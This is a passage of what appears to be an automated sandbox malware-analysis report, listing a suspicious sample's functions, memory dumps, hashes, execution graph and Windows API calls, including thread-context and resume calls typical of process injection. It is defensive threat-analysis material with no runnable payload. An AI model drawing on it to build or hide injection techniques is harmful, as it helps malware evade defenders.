                                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 2811DF76504284CFCF06CF54E5C4B16BF72FB84314F24C5A9E8090B256C336D45ACBA2
                                                                                                                                                    Function 017DF320 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b2e9f2f1144d963ed3b595649445587687c8ebfe770fc460737f131f903d84c4
                                                                                                                                                    • Instruction ID: e26a1dcfcb2781cbf509719af94cb38af7f81eaca8f5d7d89ed2b68ee9eb7f85
                                                                                                                                                    • Opcode Fuzzy Hash: b2e9f2f1144d963ed3b595649445587687c8ebfe770fc460737f131f903d84c4
                                                                                                                                                    • Instruction Fuzzy Hash: 42113D70D0010A9FDB08EFA8D580A9EBFF2FB44304F10D5B9C018A7364EB345A458B81
                                                                                                                                                    Function 0118D03F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2938633009.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_118d000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: ecd681262eb7b7e5a1f26dd8948f0da6ad2876c30d38d8b0ca03c170e35c1a58
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: BC11A9755042848FDB16DF64D9C4B16BBA2FB84314F24C6AAD8494B292C33AD44ACF62
                                                                                                                                                    Function 017D5E98 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0757e3fef1078be4b9d1ecf052705b5338a8ac5bfb1c6c85b5af945e685d0e0c
                                                                                                                                                    • Instruction ID: 1c1cd797a5baa6d230cb889b71f98377f2e0bd2d874c05a78aa355c0619ef24c
                                                                                                                                                    • Opcode Fuzzy Hash: 0757e3fef1078be4b9d1ecf052705b5338a8ac5bfb1c6c85b5af945e685d0e0c
                                                                                                                                                    • Instruction Fuzzy Hash: F0012832B0425DAFCB069E59D8206EF7FB6DFDD290B08805AFA04CB384DA318D129791
                                                                                                                                                    Function 017DE8E8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4d9f133716e3b8d2934e9702710f6532ca295d48ecf2d37a2ad3943655436882
                                                                                                                                                    • Instruction ID: 3f919201f9884776bcbfd43683ba78d08f8d906397dd81ba26a3a596b3e4771f
                                                                                                                                                    • Opcode Fuzzy Hash: 4d9f133716e3b8d2934e9702710f6532ca295d48ecf2d37a2ad3943655436882
                                                                                                                                                    • Instruction Fuzzy Hash: DE112D74D0424A9FCB02CFA8E844AAEFBB1FB49304F008066D914A3351E7785A56DF92
                                                                                                                                                    Function 017DABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e67d061ae42976cae0990ae593008308946446ba7fcb0a2accd86fbd092d11ec
                                                                                                                                                    • Instruction ID: 790f0277bc7db7d3419627e52bff794beb61c191de873edd65dc5f361d2d1309
                                                                                                                                                    • Opcode Fuzzy Hash: e67d061ae42976cae0990ae593008308946446ba7fcb0a2accd86fbd092d11ec
                                                                                                                                                    • Instruction Fuzzy Hash: 43F02B317002184B97266B2ED454A2AFBFEFFC8AA53494479E90DC7361EE21CC038380
                                                                                                                                                    Function 017D9C23 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d179f2309f212492f66ab154d82f1c55a5d4c956ff2bec9f657dfbf0187cea4
                                                                                                                                                    • Instruction ID: fdca9262ceea53e2a7b116b9356e636c0f731f59ef4fd837d005de9e749c1a38
                                                                                                                                                    • Opcode Fuzzy Hash: 9d179f2309f212492f66ab154d82f1c55a5d4c956ff2bec9f657dfbf0187cea4
                                                                                                                                                    • Instruction Fuzzy Hash: EBF090329041989FCB02DB69D894AEABFB1EF8A224F0581A6E558C7261D3314955CB51
                                                                                                                                                    Function 017D28A3 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 86164962d3255831a345fc5504fd57463281efcdfb74599efa8be355ca8125ef
                                                                                                                                                    • Instruction ID: 137dcb63e77fe13e5bb8e28dd59743a04a131f87e3d5a94ce1a67261619e8880
                                                                                                                                                    • Opcode Fuzzy Hash: 86164962d3255831a345fc5504fd57463281efcdfb74599efa8be355ca8125ef
                                                                                                                                                    • Instruction Fuzzy Hash: DBE0DF32E543268BCB01EBB0EC400EEB734AE82261B48855BC0A437190EB306219C792
                                                                                                                                                    Function 017D6739 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 818286a95fc859683b0622a5aaa6c2dca22977d4afa8a36a1c482b7197106179
                                                                                                                                                    • Instruction ID: bff879b7e447d8c1b4d0383225735dd18df1fb88a5ee97c507b071003651b7ed
                                                                                                                                                    • Opcode Fuzzy Hash: 818286a95fc859683b0622a5aaa6c2dca22977d4afa8a36a1c482b7197106179
                                                                                                                                                    • Instruction Fuzzy Hash: 5CE08C308083D54FCB07A734A8A54D87F36DE52104B1889F1C0C14A6ABDE69085BC722
                                                                                                                                                    Function 017D28B0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ceb53a7d6a84c4ef59f6461ea0148b87b413570e724c67f88e9d707e9131fd79
                                                                                                                                                    • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                                    • Opcode Fuzzy Hash: ceb53a7d6a84c4ef59f6461ea0148b87b413570e724c67f88e9d707e9131fd79
                                                                                                                                                    • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                                                    Function 017D8EF8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                    • Instruction ID: 4b86477a79635a4c687a88a22b218010c233083cd5f0ca3706f3fce5af5f11ab
                                                                                                                                                    • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                    • Instruction Fuzzy Hash: 24C0123320C1282AA325104EBC40AA3AA9DC2C12B4E2101B7FA1C93200A8429C8001BA
                                                                                                                                                    Function 017DAFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6268c857e46047d60561132b8722a93e1eaa6277a390361976a584897d5c8d0f
                                                                                                                                                    • Instruction ID: 10020b4c0b0b0afbcfa40ef02bf89a11f55cdf1c87d6f26b823478afcf0345da
                                                                                                                                                    • Opcode Fuzzy Hash: 6268c857e46047d60561132b8722a93e1eaa6277a390361976a584897d5c8d0f
                                                                                                                                                    • Instruction Fuzzy Hash: 91D0673AB40018DFCB049F99E8408DDF7B6FB98261B548516E915A3261C6319925DB54
                                                                                                                                                    Function 017D6748 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b527ec78fce79e9a856df5ff07b4e116860718f48ac8a5a1dfd472dace085e9a
                                                                                                                                                    • Instruction ID: 4e3691ede8a45ea824525f35c7de2bbab27bbfac79170f59b85ab864016ff36a
                                                                                                                                                    • Opcode Fuzzy Hash: b527ec78fce79e9a856df5ff07b4e116860718f48ac8a5a1dfd472dace085e9a
                                                                                                                                                    • Instruction Fuzzy Hash: C1C012308447098EC509FB75FD45955B73EE690204B4489309405067ADDF7D5C994790

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 017D6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                    • API String ID: 0-3001612457
                                                                                                                                                    • Opcode ID: 52552f23de01e90ae3dbc4a52bf508c08a8b062589324675ce0f02baa1910a35
                                                                                                                                                    • Instruction ID: 02654840a821289bbcd245c45aa48b316307a5702b532ffae07ed4d2249151d4
                                                                                                                                                    • Opcode Fuzzy Hash: 52552f23de01e90ae3dbc4a52bf508c08a8b062589324675ce0f02baa1910a35
                                                                                                                                                    • Instruction Fuzzy Hash: FD01DF31B401089FCB24CE2CC5449A5B7FBAF88A6072544AEF546CF3B5EA31EC418740

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:9.8%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:91
                                                                                                                                                    Total number of Limit Nodes:8
                                                                                                                                                    execution_graph 34888 dbea48 DuplicateHandle 34889 dbeade 34888->34889 34937 dbe6e8 34938 dbe6f5 34937->34938 34940 dbe72f 34938->34940 34941 dbe510 34938->34941 34942 dbe51b 34941->34942 34944 dbf040 34942->34944 34945 dbe63c 34942->34945 34946 dbe647 34945->34946 34949 db7d1c 34946->34949 34948 dbf0af 34948->34944 34950 db7d27 34949->34950 34953 db97c0 34950->34953 34952 db9ba8 34952->34948 34954 db97cb 34953->34954 34955 dbb022 34954->34955 34957 dbb073 34954->34957 34955->34952 34958 dbb07c 34957->34958 34959 dbb0ce KiUserCallbackDispatcher 34958->34959 34960 dbb0f8 34958->34960 34959->34960 34960->34955 34961 db4668 34962 db4684 34961->34962 34963 db469f 34962->34963 34967 db4800 34962->34967 34972 db4224 34963->34972 34965 db46bb 34968 db4825 34967->34968 34976 db4901 34968->34976 34980 db4910 34968->34980 34973 db422f 34972->34973 34988 db7bbc 34973->34988 34975 db7e7a 34975->34965 34978 db4904 34976->34978 34977 db4a14 34977->34977 34978->34977 34984 db4524 34978->34984 34982 db4937 34980->34982 34981 db4a14 34981->34981 34982->34981 34983 db4524 CreateActCtxA 34982->34983 34983->34981 34985 db5da0 CreateActCtxA 34984->34985 34987 db5e63 34985->34987 34987->34987 34989 db7bc7 34988->34989 34992 db7cbc 34989->34992 34991 db894d 34991->34975 34993 db7cc7 34992->34993 34996 db7cec 34993->34996 34995 db8a22 34995->34991 34997 db7cf7 34996->34997 34998 db7d1c KiUserCallbackDispatcher 34997->34998 34999 db8b25 34998->34999 34999->34995 34890 dbe800 34891 dbe846 GetCurrentProcess 34890->34891 34893 dbe898 GetCurrentThread 34891->34893 34894 dbe891 34891->34894 34895 dbe8ce 34893->34895 34896 dbe8d5 GetCurrentProcess 34893->34896 34894->34893 34895->34896 34897 dbe90b GetCurrentThreadId 34896->34897 34899 dbe964 34897->34899 35000 dbc760 35001 dbc7a8 GetModuleHandleW 35000->35001 35002 dbc7a2 35000->35002 35003 dbc7d5 35001->35003 35002->35001 34900 29484c8 34901 29484ca 34900->34901 34902 2948593 34901->34902 34903 294857e 34901->34903 34905 29480b8 3 API calls 34902->34905 34908 29480b8 34903->34908 34907 29485a2 34905->34907 34909 29480c3 34908->34909 34910 2948589 34909->34910 34913 2948f88 34909->34913 34919 2948f77 34909->34919 34926 2948104 34913->34926 34916 2948faf 34916->34910 34917 2948fd8 CreateIconFromResourceEx 34918 2949056 34917->34918 34918->34910 34920 2948f88 34919->34920 34921 2948104 CreateIconFromResourceEx 34920->34921 34923 2948fa2 34921->34923 34922 2948faf 34922->34910 34923->34922 34924 2948fd8 CreateIconFromResourceEx 34923->34924 34925 2949056 34924->34925 34925->34910 34927 2948fd8 CreateIconFromResourceEx 34926->34927 34928 2948fa2 34927->34928 34928->34916 34928->34917 34929 6eefcf0 34930 6eefd35 Wow64SetThreadContext 34929->34930 34932 6eefd7d 34930->34932 34933 6eefc40 34934 6eefc80 ResumeThread 34933->34934 34936 6eefcb1 34934->34936

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00DBE800 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 597 dbe800-dbe88f GetCurrentProcess 601 dbe898-dbe8cc GetCurrentThread 597->601 602 dbe891-dbe897 597->602 603 dbe8ce-dbe8d4 601->603 604 dbe8d5-dbe909 GetCurrentProcess 601->604 602->601 603->604 605 dbe90b-dbe911 604->605 606 dbe912-dbe92a 604->606 605->606 610 dbe933-dbe962 GetCurrentThreadId 606->610 611 dbe96b-dbe9cd 610->611 612 dbe964-dbe96a 610->612 612->611
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00DBE87E
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00DBE8BB
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00DBE8F8
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00DBE951
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                    • Opcode ID: 601ee02ec59819ae36cf11af5e62129e44ed3abd140d2304df33efe86d1f0a25
                                                                                                                                                    • Instruction ID: a789e1297747cb9500c5b235c4e9afb2dbbf630a7e0d07aa3dcabe045d34d8f5
                                                                                                                                                    • Opcode Fuzzy Hash: 601ee02ec59819ae36cf11af5e62129e44ed3abd140d2304df33efe86d1f0a25
                                                                                                                                                    • Instruction Fuzzy Hash: 485162B0900209CFDB04CFAAD548BDEBBF1AF88314F24C469E049A73A0DB749984CF65
                                                                                                                                                    Function 00DB5D77 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1310 db5d77-db5d82 1311 db5d86-db5d96 1310->1311 1312 db5d84 1310->1312 1314 db5d9a 1311->1314 1315 db5d98 1311->1315 1312->1311 1317 db5d9e-db5df1 1314->1317 1318 db5d9c 1314->1318 1315->1314 1316 db5df7-db5e61 CreateActCtxA 1315->1316 1321 db5e6a-db5ec4 1316->1321 1322 db5e63-db5e69 1316->1322 1317->1316 1318->1317 1329 db5ed3-db5ed7 1321->1329 1330 db5ec6-db5ec9 1321->1330 1322->1321 1331 db5ed9-db5ee5 1329->1331 1332 db5ee8 1329->1332 1330->1329 1331->1332 1334 db5ee9 1332->1334 1334->1334
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00DB5E51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 00c092fafeda1aa2105caae312c44801fdea3da47d5b1a4c515015bbfa974bed
                                                                                                                                                    • Instruction ID: 36172aa1da3b18510da79cb3cd503921940c888a1a0c12d629993099d7e7506d
                                                                                                                                                    • Opcode Fuzzy Hash: 00c092fafeda1aa2105caae312c44801fdea3da47d5b1a4c515015bbfa974bed
                                                                                                                                                    • Instruction Fuzzy Hash: A44125B0C00B58CFDB15CFA9D8487DDBBF1AF49304F2481AAD409AB255DB759946CFA0
                                                                                                                                                    Function 00DB5D94 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00DB5E51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 44f415e2e34f2056f1d796ede406519bd29f037f6f1d6dd5285799765b6c054e
                                                                                                                                                    • Instruction ID: 2b9f08d40cd67f86e45d1784d589a00bf117ca745a9a38d23fdbfe4641b6227a
                                                                                                                                                    • Opcode Fuzzy Hash: 44f415e2e34f2056f1d796ede406519bd29f037f6f1d6dd5285799765b6c054e
                                                                                                                                                    • Instruction Fuzzy Hash: 2D41D2B0C00619CFDB24CFA9D9447DEBBF5BF49304F24806AD409AB255DB75A945CFA0
                                                                                                                                                    Function 00DB4524 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00DB5E51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: 984b8eaff0ac9f059ab426ace7b13eb8bd52924e0e5efb32ee3ccce645209cd4
                                                                                                                                                    • Instruction ID: e8404fbf667029dce6bc8bf21c809196a512f432d019c7120cc90140d42535ff
                                                                                                                                                    • Opcode Fuzzy Hash: 984b8eaff0ac9f059ab426ace7b13eb8bd52924e0e5efb32ee3ccce645209cd4
                                                                                                                                                    • Instruction Fuzzy Hash: A841DFB0C00619CADB24CFA9D844BDEBBF5BF48304F24806AE409AB255DBB5A945CF90
                                                                                                                                                    Function 02948F88 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1756807740.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_2940000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromIconResource
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3668623891-0
                                                                                                                                                    • Opcode ID: 0839a4c112b85081a7df2c151c4e903265cf7915384a454b3e5ff13c01d76651
                                                                                                                                                    • Instruction ID: 05d1dd2199df353053b24049e6d9e8b4f64b794c5f2021b0f6f89af15d8bf4f8
                                                                                                                                                    • Opcode Fuzzy Hash: 0839a4c112b85081a7df2c151c4e903265cf7915384a454b3e5ff13c01d76651
                                                                                                                                                    • Instruction Fuzzy Hash: FC31AD719043499FCB11CFA9D840ADEBFF8EF09310F14806AF954A7261C735A850DFA1
                                                                                                                                                    Function 06EEFCE8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EEFD6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1761285331.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_6ee0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: 8f5fd2bb74c937a104581dbd8413509db2bb3d99d9c0e4c1e3d71b427bf998f9
                                                                                                                                                    • Instruction ID: 83f78798a9e2af5067d6ff15d731e106cc8a54ea13cfd40cae13791810046ac6
                                                                                                                                                    • Opcode Fuzzy Hash: 8f5fd2bb74c937a104581dbd8413509db2bb3d99d9c0e4c1e3d71b427bf998f9
                                                                                                                                                    • Instruction Fuzzy Hash: C02145B5D003088FDB10DFAAC4857EEBFF4AF88324F10842AD459A7240C7789945CFA5
                                                                                                                                                    Function 06EEFCF0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EEFD6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1761285331.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_6ee0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: d636a6a1004833540e82045eeb21d9f411c825153167e08caca11379a9a42bdd
                                                                                                                                                    • Instruction ID: 5311f83594025697bd46a4b188e5e9997fe4a76b9b7008fe3d3c63acba26f624
                                                                                                                                                    • Opcode Fuzzy Hash: d636a6a1004833540e82045eeb21d9f411c825153167e08caca11379a9a42bdd
                                                                                                                                                    • Instruction Fuzzy Hash: 042107B5D003098FDB10DFAAC4857EEBBF4AF88324F14842AD559A7250C7789945CFA5
                                                                                                                                                    Function 00DBEA48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DBEACF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.1755638501.0000000000DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_7_2_db0000_FzXKnGk.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                    • Opcode ID: 87c8d4caf9a439787e9a834402a1d3c32334e4866c51198b84bca8047110549d
                                                                                                                                                    • Instruction ID: 18a7a36fee201c47f53f22faf78852f2160058c5b473597c70baacb6cd3ad2ce
                                                                                                                                                    • Opcode Fuzzy Hash: 87c8d4caf9a439787e9a834402a1d3c32334e4866c51198b84bca8047110549d
                                                                                                                                                    • Instruction Fuzzy Hash: 3B21B3B5900258DFDB10CF9AD584ADEFBF8FB48310F14841AE954A7350D374A944CFA5
                                                                                                                                                    Function 029480F8 Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,02948FA2,?,?,?,?,?), ref: 02949047
                                                                                                                                                    Memory Dump Source
